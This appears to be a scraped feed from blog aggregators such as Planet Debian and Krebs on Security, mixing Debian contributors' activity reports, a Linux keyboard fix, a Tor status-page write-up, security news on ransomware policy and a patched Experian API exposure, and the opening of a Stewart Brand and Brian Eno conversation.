XMPP is surely not the perfect replacement for WhatsApp, but I think it is the best thing to recommend. As said above, I don’t think that Signal is an viable option. It’s just another proprierary silo with all the problems that come with it. Matrix is a resource hog and not a messenger but a MS Teams replacement. Element as the main Matrix client is laggy and not multi-account/multi-server capable. Other Matrix clients do support multiple accounts but are not as feature-complete as Element. In the end the Matrix ecosystem will suffer from the same issues as XMPP did already a decade ago. But XMPP has learned to deal with it.

Also XMPP is proceeding fast in the last years and it has solved many problems many people are still complaining about. Sure, there still some open issues. The situation on IOS is still not as good as on Android with Conversations, but it is fairly close to it.

There are many efforts to improve XMPP. There is Quicksy IM, which is a service that will use your phone number as Jabber ID/JID and is thus comparable to Signal which uses phone numbers as well as unique identifier. But Quicksy is compatible with XMPP standards. Snikket is another new XMPP ecosystem aiming at smaller groups hosting their own server by simply installing a Docker container and setup some basic SRV records in the DNS. Or there is Mailcow, a Docker based mailserver setup that added XMPP server in their setup as well, so you can have the same mail and XMPP address. Snikket even got EU based funding for implementing XMPP Account Portability which also will improve the decentralization even further. Additionally XMPP helps vaccination in Canada and USA with vaxbot by Monal.

Be smart and use ecofriendly infrastructure.

Planet DebianPetter Reinholdtsen: VLC bittorrent plugin in Bullseye, saved by the bell?

Yesterday morning I got a warning call from the Debian quality control system that the VLC bittorrent plugin was due to be removed because of a release critical bug in one of its dependencies. As you might remember, this plugin make VLC able to stream videos directly from a bittorrent source using both torrent files and magnet links, similar to using a HTTP source. I believe such protocol support is a vital feature in VLC, allowing efficient streaming from sources such at the almost 7 million movies in the Internet Archive.

The dependency was the unmaintained libtorrent-rasterbar package, and the bug in question blocked its python library from working properly. As I did not want Bullseye to release without bittorrent support in VLC, I set out to check out the status, and track down a fix for the problem. Luckily the issue had already been identified and fixed upstream, providing everything needed. All I needed to do was to fetch the Debian git repository, extract and trim the patch from upstream and apply it to the Debian package for upload.

The fixed library was uploaded yesterday evening. But that is not enough to get it into Bullseye, as Debian is currently in package freeze to prepare for a new next stable release. Only non-critical packages with autopkgtest setup included, in other words able to validate automatically that the package is working, are allowed to migrate automatically into the next release at this stage. And the unmaintained libtorrent-rasterbar lack such testing, and thus needed a manual override. I am happy to report that such manual override was approved a few minutes ago, thus increasing significantly the chance of VLC bittorrent streaming being available out of the box also for Debian/Buster users. A bit too close shave for my liking, as the Bullseye release is most likely just a few days away, and this did feel like the package was saved by the bell. I am so glad the warning email showed up in time for me to handle the issue, and a big thanks go to the Debian Release team for the quick feedback on #debian-release and their swift unblocking.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.


Planet DebianJunichi Uekawa: May.

May. Told my son about the months in English. The numbers are straightforward but couldn't remember what the other ones are. He was amused when I told him Septem is seven in Latin, and September is the ninth month. Octo, novem, decem are similar.

Planet DebianPaul Wise: FLOSS Activities April 2021


This month I didn't have any particular focus. I just worked on issues in my info bubble.





  • Debian: restart service killed by OOM killer, revert mirror redirection
  • Debian wiki: unblock IP addresses, approve accounts



The flower/sptag work was sponsored by my employer. All other work was done on a volunteer basis.

Planet DebianChris Lamb: Free software activities in April 2021

Here is my monthly update covering what I have been doing in the free software world during April 2021 (previous month):


Reproducible Builds

One of the original promises of open source software is that distributed peer review and transparency of process results in enhanced end-user security. However, whilst anyone may inspect the source code of free and open source software for malicious flaws, almost all software today is distributed as pre-compiled binaries. This allows nefarious third-parties to compromise systems by injecting malicious code into ostensibly secure software during the various compilation and distribution processes.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

The project is proud to be a member project of the Software Freedom Conservancy. Conservancy acts as a corporate umbrella allowing projects to operate as non-profit initiatives without managing their own corporate structure. If you like the work of the Conservancy or the Reproducible Builds project, please consider becoming an official supporter.

This month, I:

  • Updated the main Reproducible Builds website and documentation:

    • Highlight our mailing list on the Contribute. page [...]
    • Add a noun (and drop an unnecessary full-stop) on the landing page. [...][...]
    • Correct a reference to the date metadata attribute on reports, restoring the display of months on the homepage. [...]
    • Correct a typo of "instalment" within a previous news entry. [...]
    • Added a conspicuous "draft" banner to unpublished blog posts in order to match the report draft banner. [...]
  • I also made the following changes to diffoscope, including uploading versions 172 and 173 to Debian:

    • Add support for showing annotations in PDF files. (#249)
    • Move to the assert_diff helper in [...]



  • redis (5:6.2.2-1) (to experimental) — New upstream release.

  • python-django:

    • 2.2.20-1 — New upstream security release.
    • 3.2-1 (to experimental) — New major upstream release (release notes).
  • hiredis (1.0.0-2) — Build with SSL/TLS support (#987114), and overhaul various aspects of the packaging.

  • mtools (4.0.27-1) — New upstream release.

Debian Long Term Support (LTS)

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project:

  • Investigated and triaged avahi (CVE-2021-3468), exiv2 (CVE-2021-3482), file-roller (CVE-2020-36314), fluidsynth (CVE-2021-28421), gnuchess (CVE-2021-30184), gpac (CVE-2021-28300), imagemagick (CVE-2021-20309, CVE-2021-20243), ircii (CVE-2021-29376), jetty9 (CVE-2021-28163), libcaca (CVE-2021-30498, CVE-2021-30499), libjs-handlebars, libpano13, libpodofo (CVE-2021-30469, CVE-2021-30470, CVE-2021-30471, CVE-2021-30472), mediawiki, mpv (CVE-2021-30145), nettle (CVE-2021-20305), nginx (CVE-2020-36309), nim (CVE-2021-21372, CVE-2021-21373, CVE-2021-21374), node-glob-parent (CVE-2020-28469), openexr (CVE-2021-3474), python-django-registration (CVE-2021-21416), qt4-x11 (CVE-2021-3481), qtsvg-opensource-src (CVE-2021-3481), ruby-kramdown, scrollz (CVE-2021-29376), syncthing (CVE-2021-21404), thunderbird (CVE-2021-23991, CVE-2021-23992, CVE-2021-23993) & wordpress (CVE-2021-29447).

  • Issued DLA 2620-1 to address a cross-site scripting (XSS) vulnerability in python-bleach, a whitelist-based HTML sanitisation library.

  • Issued DLA 2622-1 and ELA 402-1 as it was discovered that there was a potential directory traversal issue in Django, the popular Python-based web development framework. The vulnerability could have been exploited by maliciously crafted filenames. However, the upload handlers built into Django itself were not affected. (#986447)

  • Jan-Niklas Sohn discovered that there was an input validation failure in the X.Org display server. Insufficient checks on the lengths of the XInput extension's ChangeFeedbackControl request could have lead to out of bounds memory accesses in the X server. These issues could have led to privilege escalation for authorised clients, particularly on systems where the X server is running as a privileged user. I, therefore, issued both DLA 2627-1 and ELA 405-1 to address this problem.

  • Frontdesk duties, reviewing others' packages, participating in mailing list discussions, etc., as well as attending our monthly meeting.

You can find out more about the project via the following video:

Planet DebianBastian Venthur: Getting the Function keys of a Keychron working on Linux

Having destroyed the third Cherry Stream keyboard in 4 years, I wanted to try a more substantial keyboard for a change. After some research I decided that I want a mechanical, wired, tenkeyless keyboard without any fancy LEDs.

At the end I settled for a Keychron C1 with red switches. It meets all requirements, looks very nice and the price is reasonable.


After the keyboard was delivered, I connected it to my Debian machine and was unpleasantly surprised to notice that the Function-keys did not work at all. The keyboard shares the Multimedia keys with the F-keys and you have an fn key that supposedly switches between the two modes, like you’re used to on a laptop. On Linux, however you cannot access the F-keys at all: pressing fn + F1 or F1 makes no difference, you’ll always get the Multimedia key. Switching the keyboard between “Windows” and “Mac” mode makes no difference either, in both modes the F-keys are not accessible.

Apparently Keychron is aware of the problem, because the quick start manual tells you:

“We have a Linux user group on facebook. Please search “Keychron Linux Group” on facebook. So you can better experience with our keyboard.”

Customer support at its finest!

So at this point you should probably just send the keyboard back, get the refund and buy a proper one with functioning F-keys.

The fix

Test if this command fixes the issue and enables the Fn + F-key-combos:

# as root:
echo 2 > /sys/module/hid_apple/parameters/fnmode

Depending on the mode the keyboard is in, you should now be able to use the F-keys by simply pressing them, and the Multimedia keys by pressing fn + F-key (or the other way round). To switch the default mode of the F-keys to Function- or Multimedia-mode, press and hold fn + X + L for 4 seconds.

If everything works as expected, you can make the change permanent by creating the file /etc/modprobe.d/hid_apple.conf and adding the line:

options hid_apple fnmode=2

This works regardless if the keyboard is in Windows- or Mac-mode, and that might hint at the problem: in both cases the Linux thinks you’re connecting a Mac keyboard.

The rant

Although the fix was not very hard to find and apply, this experience still leaves a foul taste. I naively assumed the problem of having a properly functioning keyboard that simply works when you plug it in, has been thoroughly solved by 2021.

To make it worse, I assume Keychron must be aware of the problem because the other Keychron models have the same issue! But instead of fixing it on their end, they forward you to a facebook “community” and expect you to somehow fix it yourself.

So dear Keychron, you do make really beautiful keyboards! But before you release your next model with the same bug, maybe invest a bit on fixing the basics? I see that your keyboards support firmware updates for Windows and Mac – maybe you can talk to the folks over at the Linux Vendor Firmware Service and support Linux as well? Maybe you can even fix this annoying bug for the keyboards you’ve already sold? I found it really cute that you sent different keycaps for Windows and Mac setups – a few disappointed Linux users might accept an apology in form of a Linux cap…

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, March 2021

A Debian LTS logo

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian project funding

In March, we put aside 3225 EUR to fund Debian projects but sadly nobody picked up anything, so this one of the many reasons Raphael posted as series of blog posts titled “Challenging times for Freexian”, posted in 4 parts on the last two days of March and the first two of April. [Part one, two, three and four]

So we’re still looking forward to receive more projects from various Debian teams! Learn more about the rationale behind this initiative in this article!

Debian LTS contributors

In March, 11 contributors have been paid to work on Debian LTS, their reports are available:

Evolution of the situation

In March we released 28 DLAs and held our second LTS team meeting for 2021 on IRC, with the next public IRC meeting coming up at the end of May.

At that meeting Holger announced that after 2.5 years he wanted to step back from his role helping Raphaël in coordinating/managing the LTS team. We would like to thank Holger for his continuous work on Debian LTS (which goes back to 2014) and are happy to report that we already found a successor which we will introduce in the upcoming April report from Freexian.

Finally, we would like to remark once again that we are constantly looking for new contributors. For a last time, please contact Holger if you are interested!

The security tracker currently lists 42 packages with a known CVE and the dla-needed.txt file has 28 packages needing an update.

We are also pleased to report that we got 4 new sponsors over the last 2 months : thanks to sipgate GmbH, OVH US LLC, Tilburg University and Observatoire des Sciences de l’Univers de Grenoble !

Thanks to our sponsors

Sponsors that joined recently are in bold.

Worse Than FailureError'd: An Untimely Revival

We are all hopeful that there might be some cause for tentative optimism regarding the eventual end of coronavirus pandemic. But horror fan Adam B. has dug up a new side effect that may upend everything.



Valts S. "While adding an API user to an IP camera I whipped out my trusty random password generator, copied, pasted, and got this message." These are depressingly common, aren't they? I need a catchy label for developers who solve their bobby-tables-troubles by content-filtering passwords. Suggestions, anyone?



UI expert Chris N. has diagnosed this little chucklemaker as "Firefox and Windows mixed DPI."



Vestaboard tire-kicker Daniel D. shares a definite WTF (it's obvious, right?) and possibly a 2WTF. "Is that a failsafe, if your country is not include in the dropdown? We will never know," he muses. Or maybe it's a double-secret nation hidden in the Apennines.

belgium, man.


It might not be as restorative as Adam's unearthed effect, earlier, but Peter G. has identified an unorthodox date ordering that might provide at least the illusion of eternal youth. This one probably "worked fine on my machine".



[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Cryptogram Serious MacOS Vulnerability Patched

Apple just patched a MacOS vulnerability that bypassed malware checks.

The flaw is akin to a front entrance that’s barred and bolted effectively, but with a cat door at the bottom that you can easily toss a bomb through. Apple mistakenly assumed that applications will always have certain specific attributes. Owens discovered that if he made an application that was really just a script—code that tells another program what do rather than doing it itself—and didn’t include a standard application metadata file called “info.plist,” he could silently run the app on any Mac. The operating system wouldn’t even give its most basic prompt: “This is an application downloaded from the Internet. Are you sure you want to open it?”


Planet DebianReproducible Builds (diffoscope): diffoscope 173 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 173. This version includes the following changes:

[ Chris Lamb ]
* Add support for showing annotations in PDF files.
  (Closes: reproducible-builds/diffoscope#249)
* Move to assert_diff in

[ Zachary T Welch ]
* Difference.__init__: Demote unified_diff argument to a Python "kwarg".

You find out more by visiting the project homepage.


Planet DebianAnton Gladky: 2021/04, FLOSS activity


This is my second month of working for LTS. I was assigned 12 hrs and worked all of them.

Released DLAs

  1. DLA 2619-1 python3.5_3.5.3-1+deb9u4

    CVE-2021-23336 introduced an API-change. It was hard decision to upload this fix, because it can potentially break user’s code, if they code uses semicolon as separator. Another option is not to fix it at all, leaving the security issue open. Not the best solution.

    Also I have fixed the failing autopkgtest, which was introduced in one of latest CVE fixes. CI-pipelines on salsa.d.o are helping now to detect such mistakes.

  2. DLA 2628-1 python2.7_2.7.13-2+deb9u5

    CVE-2021-23336 introduced an API-change, same as for python3.5. But the backporting was much harder because python3->2 is not always easy.


I try to setup for all LTS-packages which I touch CI-pipelines on salsa.d.o. Setting up pipelines for python3.5 and python2.7 was much harder as for other packages. Failing autopkgtests and some other issues. Though it takes at the beginning more time to setup, I believe it improves package quality.


I attended the Debian LTS team Jitsi-meeting.

Krebs on SecurityTask Force Seeks to Disrupt Ransomware Payments

Some of the world’s top tech firms are backing a new industry task force focused on disrupting cybercriminal ransomware gangs by limiting their ability to get paid, and targeting the individuals and finances of the organized thieves behind these crimes.

In a 81-page report delivered to the Biden administration this week, top executives from Amazon, Cisco, FireEye, McAfee, Microsoft and dozens of other firms joined the U.S. Department of Justice (DOJ), Europol and the U.K. National Crime Agency in calling for an international coalition to combat ransomware criminals, and for a global network of ransomware investigation hubs.

The Ransomware Task Force urged the White House to make finding, frustrating and apprehending ransomware crooks a priority within the U.S. intelligence community, and to designate the current scourge of digital extortion as a national security threat.

The Wall Street Journal recently broke the news that the DOJ was forming its own task force to deal with the “root causes” of ransomware. An internal DOJ memo reportedly “calls for developing a strategy that targets the entire criminal ecosystem around ransomware, including prosecutions, disruptions of ongoing attacks and curbs on services that support the attacks, such as online forums that advertise the sale of ransomware or hosting services that facilitate ransomware campaigns.”

According to security firm Emsisoft, almost 2,400 U.S.-based governments, healthcare facilities and schools were victims of ransomware in 2020.

“The costs of ransomware go far beyond the ransom payments themselves,” the task force report observes. “Cybercrime is typically seen as a white-collar crime, but while ransomware is profit-driven and ‘non-violent’ in the traditional sense, that has not stopped ransomware attackers from routinely imperiling lives.”

A proposed framework for a public-private operational ransomware campaign. Image: IST.

It is difficult to gauge the true cost and size of the ransomware problem because many victims never come forward to report the crimes. As such, a number of the task force’s recommendations focus on ways to encourage more victims to report the crimes to their national authorities, such as requiring victims and incident response firms who pay a ransomware demand to report the matter to law enforcement and possibly regulators at the U.S. Treasury Department.

Last year, Treasury issued a controversial memo warning that ransomware victims who end up sending digital payments to people already being sanctioned by the U.S. government for money laundering and other illegal activities could result in hefty fines.

Philip Reiner, CEO of the Institute for Security and Technology and executive director of the industry task force, said the reporting recommendations are one of several areas where federal agencies will likely need to dedicate more employees. For example, he said, expecting victims to clear ransomware payments with the Treasury Department first assumes the agency has the staff to respond in any kind of timeframe that might be useful for a victim undergoing a ransomware attack.

“That’s why we were so dead set in putting forward comprehensive framework,” Reiner said. “That way, Department of Homeland Security can do what they need to do, the State Department, Treasury gets involved, and it all needs to be synchronized for going after the bad guys with the same alacrity.”

Some have argued that making it illegal to pay a ransom is one way to decrease the number of victims who acquiesce to their tormentors’ demands. But the task force report says we’re nowhere near ready for that yet.

“Ransomware attackers require little risk or effort to launch attacks, so a prohibition on ransom payments would not necessarily lead them to move into other areas,” the report observes. “Rather, they would likely continue to mount attacks and test the resolve of both victim organizations and their regulatory authorities. To apply additional pressure, they would target organizations considered more essential to society, such as healthcare providers, local governments, and other custodians of critical infrastructure.”

“As such, any intent to prohibit payments must first consider how to build organizational cybersecurity maturity, and how to provide an appropriate backstop to enable organizations to weather the initial period of extreme testing,” the authors concluded in the report. “Ideally, such an approach would also be coordinated internationally to avoid giving ransomware attackers other avenues to pursue.”

The task force’s report comes as federal agencies have been under increased pressure to respond to a series of ransomware attacks that were mass-deployed as attackers began exploiting four zero-day vulnerabilities in Microsoft Exchange Server email products to install malicious backdoors. Earlier this month, the DOJ announced the FBI had conducted a first-of-its-kind operation to remove those backdoors from hundreds of Exchange servers at state and local government facilities.

Many of the recommendations in the Ransomware Task Force report are what you might expect, such as encouraging voluntary information sharing on ransomware attacks; launching public awareness campaigns on ransomware threats; exerting pressure on countries that operate as safe havens for ransomware operators; and incentivizing the adoption of security best practices through tax breaks.

A few of the more interesting recommendations (at least to me) included:

-Limit legal liability for ISPs that act in good faith trying to help clients secure their systems.

-Create a federal “cyber response and recovery fund” to help state and local governments or critical infrastructure companies respond to ransomware attacks.

-Require cryptocurrency exchanges to follow the same “know your customer” (KYC) and anti-money laundering rules as financial institutions, and aggressively targeting exchanges that do not.

-Have insurance companies measure and assert their aggregated ransomware losses and establish a common “war chest” subrogation fund “to evaluate and pursue strategies aimed at restitution, recovery, or civil asset seizures, on behalf of victims and in conjunction with law enforcement efforts.”

-Centralize expertise in cryptocurrency seizure, and scaling criminal seizure processes.

-Create a standard format for reporting ransomware incidents.

-Establish a ransomware incident response network.

Worse Than FailureCodeSOD: Secure By Design

Many years ago, I worked for a company that mandated that information like user credentials should never be stored "as plain text". It had to be "encoded". One of the internally-developed HR applications interpreted this as "base64 is a kind of encoding", and stored usernames and passwords in base64 encoding.

Steven recently encountered a… similar situation. Specifically, his company upgraded their ERP system, and reports that used to output taxpayer ID numbers now outputs ~201~201~210~203~… or similar values. He checked the data dictionary for the application, and saw that the taxpayer_id field stored "encrypted" values. Clearly, this data isn't really encrypted.

Steven didn't have access to the front-end code that "decrypted" this data. The reports were written in SSRS, which allows Visual Basic to script extensions. So, with an understanding of what taxpayer IDs should look like, Steven was able to "fix" the reports by adding this function:

public function ConvertTaxID(tax_id as string) as string dim splitchar as char = "~" dim splits() as string splits = tax_id.split(splitchar) dim i as integer for i = splits.length-1 to 0 step -1 if isnumeric(splits(i)) then ConvertTaxID = ConvertTaxID & CHR(splits(i) - 125) end if next i end function

We can now understand the "encryption" algorithm by understanding the decryption.

~ acts as a character separator, and each character is stored as its numeric ASCII representation, with a value added to it, which Steven undoes by subtracting the same value. To make this basic shift cypher more "secure", it's also reversed.

Steven adds:

Normally, this software is pretty solid, but this was one case where I was left wondering who got encryption advice from their 6 year old…

Sure, this is certainly an elementary school level encryption algorithm, but could a six year old have reverse engineered it? Of course not! So this is very secure, if your attacker is a six year old.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet DebianJunichi Uekawa: Setting wake-on-lan in Debian way.

Setting wake-on-lan in Debian way. There's several ways that your network interfaces can be configured. The Debian way is to use ifup/ifdown. Make sure your network is configured with it by checking ifquery. nmcli d and networkctl list are NM and systemd equivalents of commands. After you know which one is managing your device you can go ahead and set up WoL configuration appropriately. Default Debian installation would probably start with a ifup/ifdown config.

Planet DebianNorbert Preining: In memoriam of Areeb Jamal

We lost one of our friends and core developers of the FOSSASIA community. An extremely sad day.

We miss you.

Planet DebianJunichi Uekawa: Surrounding a region with Emacs lisp.

Surrounding a region with Emacs lisp. I wanted to surround a region with HTML tags and here's what I learnt today. Specifying "r" in interactive gives two numbers, begin and end. When I want to obtain multiple kinds of values in interactive, I can use newlines to delimit. set-marker is an api to keep a marker at relative position even after edits, API needs making make-marker to create an empty marker first, and seems like the number of markers affects editing speed so the API is made to allow reuse of markers. After I got these going I could now write.


Krebs on SecurityExperian API Exposed Credit Scores of Most Americans

Big-three consumer credit bureau Experian just fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity has learned. Experian says it has plugged the data leak, but the researcher who reported the finding says he fears the same weakness may be present at countless other lending websites that work with the credit bureau.

Bill Demirkapi, an independent security researcher who’s currently a sophomore at the Rochester Institute of Technology, said he discovered the data exposure while shopping around for student loan vendors online.

Demirkapi encountered one lender’s site that offered to check his loan eligibility by entering his name, address and date of birth. Peering at the code behind this lookup page, he was able to see it invoked an Experian Application Programming Interface or API — a capability that allows lenders to automate queries for FICO credit scores from the credit bureau.

“No one should be able to perform an Experian credit check with only publicly available information,” Demirkapi said. “Experian should mandate non-public information for promotional inquiries, otherwise an attacker who found a single vulnerability in a vendor could easily abuse Experian’s system.”

Demirkapi found the Experian API could be accessed directly without any sort of authentication, and that entering all zeros in the “date of birth” field let him then pull a person’s credit score. He even built a handy command-line tool to automate the lookups, which he dubbed “Bill’s Cool Credit Score Lookup Utility.”

Demirkapi’s Experian credit score lookup tool.

KrebsOnSecurity put that tool to the test, asking permission from a friend to have Demirkapi look up their credit score. The friend agreed and said he would pull his score from Experian (at this point I hadn’t told him that Experian was involved). The score he provided matched the score returned by Demirkapi’s lookup tool.

In addition to credit scores, the Experian API returns for each consumer up to four “risk factors,” indicators that might help explain why a person’s score is not higher.

For example, in my friend’s case Bill’s tool said his mid-700s score could be better if the proportion of balances to credit limits was lower, and if he didn’t owe so much on revolving credit accounts.

“Too many consumer finance company accounts,” the API concluded about my friend’s score.

The reason I could not test Demirkapi’s findings on my own credit score is that we have a security freeze on our files at the three major consumer credit reporting bureaus, and a freeze blocks this particular API from pulling the information.

Demirkapi declined to share with Experian the name of the lender or the website where the API was exposed. He refused because he said he suspects there may be hundreds or even thousands of companies using the same API, and that many of those lenders could be similarly leaking access to Experian’s consumer data.

“If we let them know about the specific endpoint, they can just ban/work with the loan vendor to block these requests on this one case, which doesn’t fix the systemic problem,” he explained.

Nevertheless, after being contacted by this reporter Experian figured out on its own which lender was exposing their API; Demirkapi said that vendor’s site now indicates the API access has been disabled.

“We have been able to confirm a single instance of where this situation has occurred and have taken steps to alert our partner and resolve the matter,” Experian said in a written statement. “While the situation did not implicate or compromise any of Experian’s systems, we take this matter very seriously. Data security has always been, and always will be, our highest priority.”

Demirkapi said he’s disappointed that Experian did exactly what he feared they would do.

“They found one endpoint I was using and sent it into maintenance mode,” he said. “But this doesn’t address the systemic issue at all.”

Leaky and poorly-secured APIs like the one Demirkapi found are the source of much mischief in the hands of identity thieves. Earlier this month, auto insurance giant Geico disclosed that fraudsters abused a bug in its site to steal drivers license numbers from Americans.

Geico said the data was used by thieves involved in fraudulently applying for unemployment insurance benefits. Many states now require drivers license numbers as a way of verifying an applicant’s identity.

In 2013, KrebsOnSecurity broke the news about an identity theft service in the underground that programmatically pulled sensitive consumer credit data directly from a subsidiary of Experian. That service was run by a Vietnamese hacker who’d told the Experian subsidiary he was a private investigator. The U.S. Secret Service later said the ID theft service “caused more material financial harm to more Americans than any other.”

Additional reading: Experian’s Credit Freeze Security is Still a Joke (Apr. 27, 2021)

Cryptogram Second Click Here to Kill Everybody Sale

For a limited time, I am selling signed copies of Click Here to Kill Everybody in hardcover for just $6, plus shipping.

I have 600 copies of the book available. When they’re gone, the sale is over and the price will revert to normal.

Order here.

Please be patient on delivery. It’s a lot of work to sign and mail hundreds of books. I try to do some each day, but sometimes I can’t. And the pandemic can cause mail slowdowns all over the world.

Cryptogram Friday Squid Blogging: On Squid Coloration

Nice excerpt from Martin Wallin’s book Squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Identifying People Through Lack of Cell Phone Use

In this entertaining story of French serial criminal Rédoine Faïd and his jailbreaking ways, there’s this bit about cell phone surveillance:

After Faïd’s helicopter breakout, 3,000 police officers took part in the manhunt. According to the 2019 documentary La Traque de Rédoine Faïd, detective units scoured records of cell phones used during his escape, isolating a handful of numbers active at the time that went silent shortly thereafter.

Planet DebianAntoine Beaupré: Building a status page service with Hugo

The Tor Project now has a status page which shows the state of our major services.

You can check for news about major outages in Tor services, including v3 and v2 onion services, directory authorities, our website (, and the tool. The status page also displays outages related to Tor internal services, like our GitLab instance.

This post documents why we launched, how the service was built, and how it works.

Why a status page

The first step in setting up a service page was to realize we needed one in the first place. I surveyed internal users at the end of 2020 to see what could be improved, and one of the suggestions that came up was to "document downtimes of one hour or longer" and generally improve communications around monitoring. The latter is still on the sysadmin roadmap, but a status page seemed like a good solution for the former.

We already have two monitoring tools in the sysadmin team: Icinga (a fork of Nagios) and Prometheus, with Grafana dashboards. But those are hard to understand for users. Worse, they also tend to generate false positives, and don't clearly show users which issues are critical.

In the end, a manually curated dashboard provides important usability benefits over an automated system, and all major organisations have one.

Picking the right tool

It wasn't my first foray in status page design. In another life, I had setup a status page using a tool called Cachet. That was already a great improvement over the previous solutions, which were to use first a wiki and then a blog to post updates. But Cachet is a complex Laravel app, which also requires a web browser to update. It generally requires more maintenance than what we'd like, needing silly things like a SQL database and PHP web server.

So when I found cstate, I was pretty excited. It's basically a theme for the Hugo static site generator, which means that it's a set of HTML, CSS, and a sprinkle of Javascript. And being based on Hugo means that the site is generated from a set of Markdown files and the result is just plain HTML that can be hosted on any web server on the planet.


At first, I wanted to deploy the site through GitLab CI, but at that time we didn't have GitLab pages set up. Even though we do have GitLab pages set up now, it's not (yet) integrated with our mirroring infrastructure. So, for now, the source is hosted and built in our legacy git and Jenkins services.

It is nice to have the content hosted in a git repository: sysadmins can just edit Markdown in the git repository and push to deploy changes, no web browser required. And it's trivial to setup a local environment to preview changes:

hugo serve --baseUrl=http://localhost/
firefox https://localhost:1313/

Only the sysadmin team and gitolite administrators have access to the repository, at this stage, but that could be improved if necessary. Merge requests can also be issued on the GitLab repository and then pushed by authorized personnel later on, naturally.


One of the concerns I have is that the site is hosted inside our normal mirror infrastructure. Naturally, if an outage occurs there, the site goes down. But I figured it's a bridge we'll cross when we get there. Because it's so easy to build the site from scratch, it's actually trivial to host a copy of the site on any GitLab server, thanks to the .gitlab-ci.yml file shipped (but not currently used) in the repository. If push comes to shove, we can just publish the site elsewhere and point DNS there.

And, of course, if DNS fails us, then we're in trouble, but that's the situation anyway: we can always register a new domain name for the status page when we need to. It doesn't seem like a priority at the moment.

Comments and feedback are welcome!

This article was first published on the Tor Project Blog.

Planet DebianJonathan McDowell: DeskPi Pro update

I wrote previously about my DeskPi Pro + 8GB Pi 4 setup. My main complaint at the time was the fact one of the forward facing USB ports broke off early on in my testing. For day to day use that hasn’t been a problem, but it did mar the whole experience. Last week I received an unexpected email telling me “The new updated PCB Board for your DeskPi order was shipped.”. Apparently this was due to problems with identifying SSDs and WiFi/HDMI issues. I wasn’t quite sure how much of the internals they’d be replacing, so I was pleasantly surprised when it turned out to be most of them; including the PCB with the broken USB port on my device.

DeskPi Pro replacement PCB

They also provided a set of feet allowing for vertical mounting of the device, which was a nice touch.

The USB/SATA bridge chip in use has changed; the original was:

usb 2-1: New USB device found, idVendor=152d, idProduct=0562, bcdDevice= 1.09
usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
usb 2-1: Product: RPi_SSD
usb 2-1: Manufacturer: 52Pi
usb 2-1: SerialNumber: DD5641988389F

and the new one is:

usb 2-1: New USB device found, idVendor=174c, idProduct=1153, bcdDevice= 0.01
usb 2-1: New USB device strings: Mfr=2, Product=3, SerialNumber=1
usb 2-1: Product: AS2115
usb 2-1: Manufacturer: ASMedia
usb 2-1: SerialNumber: 00000000000000000000

That’s a move from a JMicron 6Gb/s bridge to an ASMedia 3Gb/s bridge. It seems there are compatibility issues with the JMicron that mean the downgrade is the preferred choice. I haven’t retried the original SSD I wanted to use (that wasn’t detected), but I did wonder if this might have resolved that issue too.

Replacing the PCB was easier than the original install; everything was provided pre-assembled and I just had to unscrew the Pi4 and slot it out, then screw it into the new PCB assembly. Everything booted fine without the need for any configuration tweaks. Nice and dull. I’ve tried plugging things into the new USB ports and they seem ok so far as well.

However I also then ended up pulling in a new backports kernel from Debian (upgrading from 5.9 to 5.10) which resulted in a failure to boot. The kernel and initramfs were loaded fine, but no login prompt ever appeared. Some digging led to the discovery that a change in boot ordering meant USB was not being enabled. The solution is to add reset_raspberrypi to the /etc/initramfs-tools/modules file - that way this module is available in the initramfs, the appropriate pre-USB reset can happen and everything works just fine again.

The other niggle with the new kernel was a regular set of errors in the kernel log:

mmc1: Timeout waiting for hardware cmd interrupt.
mmc1: sdhci: ============ SDHCI REGISTER DUMP ===========

and a set of registers afterwards, roughly every 10s or so. This seems to be fallout from an increase in the core clock due to the VC4 driver now being enabled, the fact I have no SD card in the device and a lack of working card-detect line for the MicroSD slot. There’s a GitHub issue but I solved it by removing the sdhci_iproc for now - I’m not using the wifi so loss of MMC isn’t a problem.

Credit to DeskPi for how they handled this. I didn’t have to do anything and didn’t even realise anything was happening until I got the email with my tracking number and a description of what they were sending out in it. Delivery took less than a week. This is a great example of how to handle a product issue - no effort required on the part of the customer.

LongNowStewart Brand and Brian Eno on “We Are As Gods”

In March 02021, We Are As Gods, the documentary about Long Now co-founder Stewart Brand, premiered at SXSW. As part of the premiere, the documentary’s directors, David Alvarado and Jason Sussberg, hosted a conversation between Brand and fellow Long Now co-founder Brian Eno. (Eno scored the film, contributing 24 original tracks to the soundtrack.) The full conversation can be watched above. A transcript follows below.  

David Alvarado: Hi. My name is David Alvarado. I’m one of the directors for a new documentary film called We Are as Gods. This is a documentary feature that explores the extraordinary life of a radical thinker, environmentalist, and controversial technologist, Stewart Brand. This is a story that marries psychedelia, counterculture, futurism. It’s an unexpected journey of a complicated American polymath at the vanguard of our culture.

Today, we’re having a conversation with the subject of the film himself, Stewart Brand, and Brian Eno.

Jason Sussberg: Okay. In the unlikely event that you don’t know either of our two speakers, allow me to introduce them. First off, we have Brian Eno, who’s a musician, a producer, a visual artist and an activist. He is the founding member of the Long Now Foundation, along with Stewart Brand. He’s a musician of multiple albums, solo and collaborative. His latest album is called Film Music 1976-2020, which was released a few months ago, and we are lucky bastards because it includes a song from our film, We Are as Gods, called “A Reasonable Question.”

